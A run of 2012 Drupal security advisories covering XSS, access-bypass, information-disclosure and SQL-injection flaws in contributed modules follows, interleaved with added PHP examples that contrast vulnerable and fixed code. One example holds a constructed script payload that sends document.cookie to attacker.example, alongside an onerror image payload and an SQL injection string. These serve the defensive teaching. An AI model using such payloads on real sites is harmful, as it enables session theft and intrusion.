The module also doesn't sufficiently sanitize output field names in the admin view. This is mitigated by the fact that an attacker would have to have the necessary permissions to change the field names of an indexed entity type.

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Search API 7.x-1.x versions prior to 7.x-1.4.

Drupal core is not affected. If you do not use the contributed Search API [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Search API module for Drupal 7.x, upgrade to Search API 7.x-1.4 [5]

Also see the Search API [6] project page.

REPORTED BY

* XSS in Views error messages was reported by Josh Stroschein [7].
* XSS in field names was reported by Francisco José Cruz Romanos [8].

FIXED BY

* XSS in Views error messages was fixed by Lee Rowlands [9] of the Drupal Security Team and Bojan Živanović [10].
* XSS in field names was fixed by Francisco José Cruz Romanos [11].

COORDINATED BY

* Lee Rowlands [12] of the Drupal Security Team
* Greg Knaddison [13] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17].

[1] http://drupal.org/project/search_api
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/search_api
[5] http://drupal.org/node/1884076
[6] http://drupal.org/project/search_api
[7] http://drupal.org/user/2198458
[8] http://drupal.org/user/848238
[9] http://drupal.org/user/395439
[10] http://drupal.org/user/86106
[11] http://drupal.org/user/848238
[12] http://drupal.org/user/395439
[13] http://drupal.org/user/36762
[14] http://drupal.org/contact
[15] http://drupal.org/security-team
[16] http://drupal.org/writing-secure-code
[17] http://drupal.org/security/secure-configuration
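The four XSS advisories in this batch (Search API sorts, CurvyCorners, User Relationships and Search API) share one root cause: text controlled by an administrator-level role, or by a URL parameter, is concatenated into HTML without escaping. The added example below is plain PHP runnable outside Drupal and is not code from any of those modules. It shows an unescaped rendering beside one that escapes at output time with the same htmlspecialchars() call Drupal's check_plain() makes, for both the stored-label case (administer-permission XSS) and the reflected case (a query parameter echoed into an error message). The label, the query string and the markup around them are constructed; the detector at the end only exists to make the difference visible in the printed output.

```php
<?php
// Added example, not code from the Search API, Search API sorts, CurvyCorners
// or User Relationships modules. Demonstrates: escape at the point of output.
// All inputs are constructed.

/** Escape text for HTML text or attribute context (what Drupal's check_plain() does). */
function escape_plain(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

/** VULNERABLE pattern: an administrator-entered label is concatenated into markup. */
function render_label_unsafe(string $label): string
{
    return '<th class="label">' . $label . '</th>';
}

/** FIXED pattern: escape when rendering, not when storing (storage keeps the raw text). */
function render_label_safe(string $label): string
{
    return '<th class="label">' . escape_plain($label) . '</th>';
}

/** Reflected XSS: a query parameter echoed back inside an error message. $query stands in for $_GET. */
function render_search_error_unsafe(array $query): string
{
    $keys = $query['keys'] ?? '';
    return '<div class="messages error">No results for "' . $keys . '".</div>';
}

function render_search_error_safe(array $query): string
{
    $keys = $query['keys'] ?? '';
    return '<div class="messages error">No results for "' . escape_plain($keys) . '".</div>';
}

/** Crude check used only to label the demo output; not a sanitiser. */
function contains_active_markup(string $html): bool
{
    return (bool) preg_match('/<script\b|<img\b[^>]*\bon[a-z]+\s*=/i', $html);
}

// Constructed: a relationship name saved by an "administer user relationships"
// role, and the query string of a crafted search URL.
$label = 'Friend<script>document.location="http://attacker.example/?c="+document.cookie</script>';
$query = ['keys' => '"><img src=x onerror=alert(document.domain)>'];

$cases = [
    'label unsafe' => render_label_unsafe($label),
    'label safe'   => render_label_safe($label),
    'error unsafe' => render_search_error_unsafe($query),
    'error safe'   => render_search_error_safe($query),
];
foreach ($cases as $case => $html) {
    printf("%-13s active markup: %-3s %s\n", $case, contains_active_markup($html) ? 'yes' : 'no', $html);
}
```

The "mitigated by the fact that an attacker must have permission X" wording in these advisories is about likelihood, not about the fix: the output layer has to escape regardless of who is allowed to write the value, because the next module to reuse that label will not know which role entered it.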
[Full-disclosure] [Security-news] SA-CONTRIB-2012-174 - Context - Information Disclosure
View online: http://drupal.org/node/1870550

* Advisory ID: DRUPAL-SA-CONTRIB-2012-174
* Project: Context [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-December-19
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Information Disclosure

DESCRIPTION

Context has functionality that renders block content for use with its inline editor. When these requests are made the context module does not sufficiently ensure that users have access to the block. A malicious user could send a specially crafted request and get access to block content they should not be able to see.

This vulnerability is mitigated by the fact that an attacker must know the identifiers for the block containing sensitive information and that the block's code must render that sensitive information when requested by a user without privileges to see this information.

CVE IDENTIFIER(S) ISSUED

* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED

* Context 6.x-3.x versions prior to 6.x-3.1.
* Context 7.x-3.x versions prior to 7.x-3.0-beta6.

Drupal core is not affected. If you do not use the contributed Context [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Context module for Drupal 6.x, upgrade to Context 6.x-3.1 [5]
* If you use the Context module for Drupal 7.x, upgrade to Context 7.x-3.0-beta6 [6]

Also see the Context [7] project page.

REPORTED BY

* Fox (hefox) [8] of the Drupal Security Team

FIXED BY

* Fox (hefox) [9] the module maintainer
* tekante [10] the module maintainer

COORDINATED BY

* Fox (hefox) [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/context
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/context
[5] http://drupal.org/node/1870518
[6] http://drupal.org/node/1869910
[7] http://drupal.org/project/context
[8] http://drupal.org/user/426416
[9] http://drupal.org/user/426416
[10] http://drupal.org/user/640024
[11] http://drupal.org/user/426416
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
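The access-bypass and information-disclosure advisories in this batch (email2image, Keyboard Shortcut Utility, Payment, Context) are all the same shape: a callback loads an object by identifier and renders it, and the only gate is a role permission that says nothing about that particular object. The added example below is plain PHP and not the Payment module's code: it shows a check that collapses to "has the 'own' permission" beside one that actually compares the record's owner, wrapped in the load-check-render order a page callback should follow. The permission names, account and payment records are constructed (the advisory does not name Payment's permissions); has_permission() stands in for Drupal's user_access(), and for node-bound output the equivalent object-level test is node_access('view', $node) on the loaded node before anything is rendered.

```php
<?php
// Added example, not code from the Payment module. Demonstrates: an
// object-level access check, and the load -> check -> render order.
// Permission names, accounts and records are constructed.

/** Stand-in for Drupal's user_access(): uid 1 bypasses permission checks. */
function has_permission(array $account, string $permission): bool
{
    return (int) $account['uid'] === 1
        || in_array($permission, $account['permissions'], true);
}

/** BROKEN: the "own" permission is treated as if it implied ownership. */
function payment_view_access_broken(array $payment, array $account): bool
{
    return has_permission($account, 'view any payment')
        || has_permission($account, 'view own payments');    // never looks at $payment
}

/** FIXED: "own" only grants access to records whose uid matches the caller. */
function payment_view_access(array $payment, array $account): bool
{
    if (has_permission($account, 'view any payment')) {
        return true;
    }
    return has_permission($account, 'view own payments')
        && (int) $payment['uid'] === (int) $account['uid'];
}

/**
 * Page-callback shape: load by id, check access on the loaded object, then
 * render. Returns the body, or the status the callback would send instead.
 */
function payment_view_page(int $pid, array $payments, array $account): string
{
    if (!isset($payments[$pid])) {
        return '404 Not Found';
    }
    $payment = $payments[$pid];
    if (!payment_view_access($payment, $account)) {
        return '403 Forbidden';                // drupal_access_denied() in Drupal
    }
    return sprintf('Payment %d: %s %s', $pid, $payment['amount'], $payment['currency']);
}

// Constructed data: two payments owned by different users, one ordinary account.
$payments = [
    10 => ['uid' => 5, 'amount' => '19.99',  'currency' => 'EUR'],
    11 => ['uid' => 6, 'amount' => '250.00', 'currency' => 'USD'],
];
$alice = ['uid' => 5, 'permissions' => ['view own payments']];

echo payment_view_page(10, $payments, $alice), "\n";            // own record: rendered
echo payment_view_page(11, $payments, $alice), "\n";            // another user's: 403 Forbidden
var_dump(payment_view_access_broken($payments[11], $alice));    // bool(true): the bypass
var_dump(payment_view_access($payments[11], $alice));           // bool(false)
```

The Context case is the same mistake one level up: the inline-editor endpoint rendered a block for whoever asked, so the fix is to run the block's own access logic for the requesting user before returning its content, rather than trusting that only editors will know the identifiers.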
[Full-disclosure] [Security-news] SA-CORE-2012-004 - Drupal core - Multiple vulnerabilities
ecure code for Drupal [33], and securing your site [34].

[1] http://drupal.org/project/drupal
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/node/1004778
[4] http://drupal.org/node/65409
[5] http://drupal.org/node/1543392
[6] http://cve.mitre.org/
[7] http://drupal.org/drupal-6.27-release-notes
[8] http://drupal.org/drupal-7.18-release-notes
[9] http://drupal.org/project/drupal
[10] http://drupal.org/user/46549
[11] http://drupal.org/user/151544
[12] http://drupal.org/user/22211
[13] http://drupal.org/user/181407
[14] http://drupal.org/user/46549
[15] http://drupal.org/user/383424
[16] http://drupal.org/user/49851
[17] http://drupal.org/user/124982
[18] http://drupal.org/user/400288
[19] http://drupal.org/user/426416
[20] http://drupal.org/user/124982
[21] http://drupal.org/user/35821
[22] http://drupal.org/user/302225
[23] http://drupal.org/user/58170
[24] http://drupal.org/user/36762
[25] http://drupal.org/user/148199
[26] http://drupal.org/user/91990
[27] http://drupal.org/user/124982
[28] http://drupal.org/user/4166
[29] http://drupal.org/user/36762
[30] http://drupal.org/user/426416
[31] http://drupal.org/contact
[32] http://drupal.org/security-team
[33] http://drupal.org/writing-secure-code
[34] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-173 - Nodewords: Information disclosure
View online: http://drupal.org/node/1859282

* Advisory ID: DRUPAL-SA-CONTRIB-2012-173
* Project: Nodewords: D6 Meta Tags [1] (third-party module)
* Version: 6.x
* Date: 2012-December-05
* Security risk: Not critical [2]
* Exploitable from: Remote
* Vulnerability: Information Disclosure

DESCRIPTION

This module enables you to assign meta tags on Drupal 6 sites to aid with third-party search indexing and sharing on social networks.

The module doesn't correctly filter node content when configured to automatically generate description meta tags from the node text. This lack of filtering could allow some code, e.g. BBCode, to pass through unprocessed and potentially expose private or otherwise secret information, links, file paths or other sensitive details. The problem affects the normal 'description' meta tag along with the 'dc.description' and 'og:description' meta tags, all of which used the same logic.

This vulnerability is mitigated by the fact that it is unlikely that sensitive content would be within the extracted portion.

CVE IDENTIFIER(S) ISSUED

* A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes.

VERSIONS AFFECTED

* Nodewords 6.x-1.x versions prior to 6.x-1.14.

Drupal core is not affected. If you do not use the contributed Nodewords: D6 Meta Tags [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Nodewords module for Drupal 6.x, upgrade to Nodewords 6.x-1.14 [5].

Also see the Nodewords: D6 Meta Tags [6] project page.

REPORTED BY

* Andrey Tretyakov [7]
* asb [8]

FIXED BY

* Damien McKenna [9], the module maintainer

COORDINATED BY

* Chris Hales [10] of the Drupal Security Team
* Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/nodewords
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/nodewords
[5] http://drupal.org/node/1859208
[6] http://drupal.org/project/nodewords
[7] http://drupal.org/user/169459
[8] http://drupal.org/user/37833
[9] http://drupal.org/user/108450
[10] http://drupal.org/user/347249
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-172 - Zero Point - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1853376

* Advisory ID: DRUPAL-SA-CONTRIB-2012-172
* Project: Zero Point [1] (third-party theme)
* Version: 6.x, 7.x
* Date: 2012-November-28
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

Zero Point is an advanced theme which includes many options, ideal for a wide range of sites.

The theme does not escape path aliases, exposing a cross site scripting (XSS) vulnerability in URLs.

There are no mitigating factors.

CVE: Requested

VERSIONS AFFECTED

* zeropoint 6.x-1.x versions prior to 6.x-1.18
* zeropoint 7.x-1.x versions prior to 7.x-1.4

Drupal core is not affected. If you do not use the contributed Zero Point [3] theme, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Zero Point theme for Drupal 6.x, upgrade to zeropoint 6.x-1.18 [4]
* If you use the Zero Point theme for Drupal 7.x, upgrade to zeropoint 7.x-1.4 [5]

Also see the Zero Point [6] project page.

REPORTED BY

* samatha [7]

FIXED BY

* Florian Radut [8], the theme maintainer
* Christian López Espínola [9]

COORDINATED BY

* Klaus Purer [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/zeropoint
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/zeropoint
[4] http://drupal.org/node/1853358
[5] http://drupal.org/node/1853350
[6] http://drupal.org/project/zeropoint
[7] http://drupal.org/user/534190
[8] http://drupal.org/user/35316
[9] http://drupal.org/user/959536
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-168 - Services - Information Disclosure
View online: http://drupal.org/node/1853200

* Advisory ID: DRUPAL-SA-CONTRIB-2012-168
* Project: Services [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-11-28
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Information Disclosure

DESCRIPTION

This module enables you to access content from a remote client.

The module doesn't sufficiently adhere to standard Drupal permissions and exposes users' e-mail addresses via the user index method.

This vulnerability is mitigated by the fact that an attacker must know the path to the user resource and must be able to access user profiles (have the 'access user profiles' permission).

CVE: Requested

VERSIONS AFFECTED

* Services 6.x-3.x versions prior to 6.x-3.3.
* Services 7.x-3.x versions prior to 7.x-3.3.

Drupal core is not affected. If you do not use the contributed Services [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Services module for Drupal 6.x, upgrade to Services 6.x-3.3 [4]
* If you use the Services module for Drupal 7.x, upgrade to Services 7.x-3.3 [5]

Also see the Services [6] project page.

REPORTED BY

* Fox (hefox) [7] of the Drupal Security Team

FIXED BY

* Fox (hefox) [8] of the Drupal Security Team
* Kyle Browning [9], the module maintainer

COORDINATED BY

* Fox (hefox) [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/services
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/services
[4] http://drupal.org/node/1842026
[5] http://drupal.org/node/1842022
[6] http://drupal.org/project/services
[7] http://drupal.org/user/426416
[8] http://drupal.org/user/426416
[9] http://drupal.org/user/211387
[10] http://drupal.org/user/426416
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
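As an added illustration of the "adhere to standard Drupal permissions" point in the Services advisory (example code written for this page, not the Services module's own implementation), here is a Drupal 7 resource callback that lists user accounts but returns the e-mail address only to callers holding 'administer users', the permission core itself requires before showing another account's address. It assumes a Drupal 7 bootstrap; the function names, the page size and the use of the Services module's services_error() helper are this example's assumptions.

```php
<?php
// Added example, not the Services module's code. Assumes a Drupal 7 bootstrap:
// user_access(), user_load_multiple() and db_select() are core; services_error()
// is the Services module's error helper. Names and page size are this example's.

/**
 * Resource callback: list user accounts for an API client.
 *
 * The permission model mirrors core's profile pages: 'access user profiles'
 * lets a caller see that accounts exist and what they are called;
 * 'administer users' is required before the e-mail address or status
 * is returned.
 */
function example_user_index($page = 0, $page_size = 20) {
  if (!user_access('access user profiles')) {
    return services_error(t('Access denied'), 403);
  }
  $uids = db_select('users', 'u')
    ->fields('u', array('uid'))
    ->condition('u.uid', 0, '>')
    ->orderBy('u.uid')
    ->range($page * $page_size, $page_size)
    ->execute()
    ->fetchCol();

  $see_private = user_access('administer users');
  $out = array();
  foreach (user_load_multiple($uids) as $account) {
    $out[] = example_user_public_view($account, $see_private);
  }
  return $out;
}

/**
 * Copy only whitelisted properties off a fully loaded account object.
 *
 * Returning $account itself, or unsetting a few fields from it, is the
 * pattern that leaks: a loaded user carries mail, init, pass (the hash),
 * data, roles and every attached field. Build the response up from
 * nothing instead, so a property added later by core or another module
 * stays private by default.
 */
function example_user_public_view($account, $see_private) {
  $view = array(
    'uid' => (int) $account->uid,
    'name' => $account->name,
    'created' => (int) $account->created,
  );
  if ($see_private) {
    $view['mail'] = $account->mail;
    $view['status'] = (int) $account->status;
    $view['roles'] = array_values($account->roles);
  }
  return (object) $view;
}
```

The whitelist is the important design choice: an index endpoint that serialises whatever user_load() returns will expose the e-mail address (and anything a future module attaches) unless every property is consciously removed, which is exactly the kind of omission the advisory describes.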
[Full-disclosure] [Security-news] SA-CONTRIB-2012-170 - MultiLink - Access Bypass
View online: http://drupal.org/node/1853244

* Advisory ID: DRUPAL-SA-CONTRIB-2012-170
* Project: Multi-Language Link and Redirect (MultiLink) [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-November-28
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

MultiLink allows you to generate in-content links to a suitable node or node translation based on the visitor's language preferences. It allows the node title of the target node to be shown as the visible text and title attribute for the generated link.

Prior to versions 6.x-2.7 and 7.x-2.7 the module doesn't check that the current user has access to a node referenced by the generated link, so the title of that node (and nothing else) may be disclosed to a user who would otherwise have no access to that node.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to edit text using an input format for which the MultiLink filter has been enabled.

CVE: Requested

VERSIONS AFFECTED

* MultiLink 6.x-2.x versions prior to 6.x-2.7 [3].
* MultiLink 7.x-2.x versions prior to 7.x-2.7 [4].

Drupal core is not affected. If you do not use the contributed Multi-Language Link and Redirect (MultiLink) [5] module, there is nothing you need to do.

SOLUTION

Install the latest version; see the project page http://drupal.org/project/multilink [6] for downloads.

Also see the Multi-Language Link and Redirect (MultiLink) [7] project page.

REPORTED BY

* Andy Inman [8], the module maintainer

FIXED BY

* Andy Inman [9], the module maintainer

COORDINATED BY

* Stéphane Corlosquet [10] of the Drupal Security Team
* Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/multilink
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/node/1289292
[4] http://drupal.org/node/1289294
[5] http://drupal.org/project/multilink
[6] http://drupal.org/project/multilink
[7] http://drupal.org/project/multilink
[8] http://drupal.org/user/216383
[9] http://drupal.org/user/216383
[10] http://drupal.org/user/52142
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-171 - Webmail Plus - SQL injection - (unsupported)
View online: http://drupal.org/node/1853268

* Advisory ID: DRUPAL-SA-CONTRIB-2012-171
* Project: Webmail Plus [1] (third-party module)
* Version: 6.x
* Date: 2012-November-28
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: SQL Injection

DESCRIPTION

The Webmail Plus module is a full-featured email client for Drupal. It's designed to provide email for any or all members of a Drupal site.

The module doesn't sufficiently sanitize user input as it is used in a database query.

CVE: Requested

VERSIONS AFFECTED

* All Webmail Plus module versions.

Drupal core is not affected. If you do not use the contributed Webmail Plus [3] module, there is nothing you need to do.

SOLUTION

Uninstall the module:

* If you use the Webmail Plus module you should disable the module.

Also see the Webmail Plus [4] project page.

REPORTED BY

* Fox [5] of the Drupal Security Team

COORDINATED BY

* Gerhard Killesreiter [6] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7].

Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10].

[1] http://drupal.org/project/webmail_plus
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/webmail_plus
[4] http://drupal.org/project/webmail_plus
[5] http://drupal.org/user/426464
[6] http://drupal.org/user/83
[7] http://drupal.org/contact
[8] http://drupal.org/security-team
[9] http://drupal.org/writing-secure-code
[10] http://drupal.org/security/secure-configuration
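To make the advisory's one-line finding ("user input ... used in a database query") concrete, the following added example, written for this page and not taken from Webmail Plus, shows a Drupal 6 query built by string concatenation beside the placeholder form the Drupal 6 database layer provides. It assumes a Drupal 6 bootstrap; the table {example_mail_message} and its columns are hypothetical.

```php
<?php
// Added example, not code from Webmail Plus. Assumes a Drupal 6 bootstrap;
// db_query() and db_fetch_object() are core D6. The table
// {example_mail_message} and its columns mid, subject, uid, folder are
// hypothetical.

/**
 * VULNERABLE: request data is pasted into the SQL text.
 *
 * With $folder = "inbox' OR '1'='1" the WHERE clause matches every row in
 * the table, for every user; with a UNION it reads any other table the
 * database account can see.
 */
function example_messages_unsafe($uid, $folder) {
  $result = db_query("SELECT mid, subject FROM {example_mail_message} "
    . "WHERE uid = $uid AND folder = '$folder'");
  $rows = array();
  while ($row = db_fetch_object($result)) {
    $rows[] = $row;
  }
  return $rows;
}

/**
 * FIXED: Drupal 6 placeholders. %d casts the argument to an integer and %s
 * is run through db_escape_string(); the '%s' must be quoted in the query
 * text, and a literal % in the SQL has to be written as %%.
 *
 * The Drupal 7 equivalent uses named placeholders instead:
 *   db_query("... WHERE uid = :uid AND folder = :folder",
 *            array(':uid' => $uid, ':folder' => $folder));
 */
function example_messages_safe($uid, $folder) {
  $result = db_query("SELECT mid, subject FROM {example_mail_message} "
    . "WHERE uid = %d AND folder = '%s'", $uid, $folder);
  $rows = array();
  while ($row = db_fetch_object($result)) {
    $rows[] = $row;
  }
  return $rows;
}

/**
 * Escaping fixes the injection, not the authorization. Take the owner from
 * the session, never from the request, so a user cannot read another
 * user's folder simply by supplying a well-formed uid.
 */
function example_messages_for_current_user($folder) {
  global $user;
  return example_messages_safe($user->uid, $folder);
}
```

The advisory's remedy is to disable the module rather than patch it, because no fixed release exists; the example is there to show what a reviewer would look for when auditing a module that is still supported.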
[Full-disclosure] [Security-news] SA-CONTRIB-2012-169 - Email Field - Cross Site Scripting and Access bypass
View online: http://drupal.org/node/1853214

* Advisory ID: DRUPAL-SA-CONTRIB-2012-169
* Project: Email Field [1] (third-party module)
* Version: 6.x
* Date: 2012-11-28
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting, Access bypass

DESCRIPTION

The email module provides a field type (CCK / FieldAPI) for storing email addresses and a formatter to output the email address as a link to a contact form. The contact form formatter allows a site visitor to email the stored address without letting them see what that e-mail address is.

Access bypass

The module didn't sufficiently check access for the contact form page, allowing a site visitor to email the stored address on the entity without having access to the field itself.

This vulnerability is mitigated by the fact that the site must use a field permission module (other than CCK's Content Permissions) with those email fields and must have the contact field formatter configured for either the full or teaser display mode.

CVE: Requested

Cross Site Scripting

Furthermore, the mailto link wasn't sanitized when output to the screen.

This vulnerability is mitigated by the fact that Drupal's form validation for emails prevents malicious emails and would need to be bypassed to exploit this vulnerability, e.g. by importing data from external sources without validation.

CVE: Requested

VERSIONS AFFECTED

* Email Field 6.x-1.x versions prior to 6.x-1.3.

Drupal core is not affected. If you do not use the contributed Email Field [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Email Field module for Drupal 6.x, upgrade to Email 6.x-1.4 [4]

Also see the Email Field [5] project page.

REPORTED BY

* Fox (hefox) [6]

FIXED BY

* Matthias Hutterer [7], the module maintainer

COORDINATED BY

* Fox (hefox) [8] of the Drupal Security Team
* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/email
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/email
[4] http://drupal.org/node/1852612
[5] http://drupal.org/project/email
[6] http://drupal.org/user/426416
[7] http://drupal.org/user/59747
[8] http://drupal.org/user/426416
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-167 - Mixpanel - Cross site scripting (XSS)
View online: http://drupal.org/node/1853198

* Advisory ID: DRUPAL-SA-CONTRIB-2012-167
* Project: Mixpanel [1] (third-party module)
* Version: 6.x
* Date: 2012-November-28
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

This module provides integration with the Mixpanel real-time analytics service.

The module doesn't sufficiently escape the Mixpanel token when adding the tracking JavaScript to the page.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "access administration pages".

CVE: Requested

VERSIONS AFFECTED

* Mixpanel 6.x-1.x versions prior to 6.x-1.1.

Drupal core is not affected. If you do not use the contributed Mixpanel [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Mixpanel module for Drupal 6.x, upgrade to Mixpanel 6.x-1.1 [4]

Also see the Mixpanel [5] project page.

REPORTED BY

* David Snopek [6]

FIXED BY

* wundo [7], the module maintainer
* David Snopek [8]

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/mixpanel
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mixpanel
[4] http://drupal.org/node/1852098
[5] http://drupal.org/project/mixpanel
[6] http://drupal.org/user/266527
[7] http://drupal.org/user/25523
[8] http://drupal.org/user/266527
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-166 - Table of Contents - Access Bypass
View online: http://drupal.org/node/1841046

* Advisory ID: DRUPAL-SA-CONTRIB-2012-166
* Project: Table of Contents [1] (third-party module)
* Version: 6.x
* Date: 2012-November-14
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

This module enables you to generate a list of selected header tags in a box that looks like a table of contents or summary. The links added to that box point to the headers so users can quickly access each section of your documents.

The module doesn't sufficiently check for node access restrictions when displaying the table of contents in a block.

This vulnerability is mitigated by the fact that an attacker must find a node that is not visible to them and yet displays its blocks, including the table of contents block. In some Drupal installations, this can happen for unpublished nodes. Also, the attacker will only see the headers (content between H1 to H6 tags) appearing in the table of contents, not the entire page.

CVE: Requested

VERSIONS AFFECTED

* tableofcontents 6.x-3.x versions prior to 6.x-3.8.

Drupal core is not affected. If you do not use the contributed Table of Contents [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Table of Contents module for Drupal 6.x, upgrade to tableofcontents 6.x-3.8 [4]

Also see the Table of Contents [5] project page.

REPORTED BY

* Erik Webb [6]

FIXED BY

* Erik Webb [7], the reporter
* Alexis Wilke [8], the Drupal 6.x maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/tableofcontents
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/tableofcontents
[4] http://drupal.org/node/1841026
[5] http://drupal.org/project/tableofcontents
[6] http://drupal.org/user/273404
[7] http://drupal.org/user/273404
[8] http://drupal.org/user/356197
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
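The MultiLink and Table of Contents advisories above describe the same mistake: rendering a piece of a node (its title, its headings) without asking node_access() whether the current user may view it. The following added example, written for this page and not code from either module, shows the check in both places under Drupal 6, including the unpublished-node case the Table of Contents advisory mentions. It assumes a Drupal 6 bootstrap; the function names are this example's own.

```php
<?php
// Added example, not MultiLink's or Table of Contents' code. Assumes a Drupal 6
// bootstrap; node_load(), node_access(), check_markup(), check_plain(), l(),
// arg() and theme() are core D6. Function names are this example's own.

/**
 * Build an in-content link to a node, as a MultiLink-style filter would.
 *
 * Returns '' when the current user may not view the target, so neither the
 * title nor the existence of the node leaks through the rendered text.
 * node_access() also returns FALSE for an unpublished node unless the
 * viewer is its author or has 'administer nodes'.
 */
function example_node_link($nid) {
  $node = node_load((int) $nid);
  if (!$node || !node_access('view', $node)) {
    return '';
  }
  // l() escapes the link text and drupal_attributes() escapes the title
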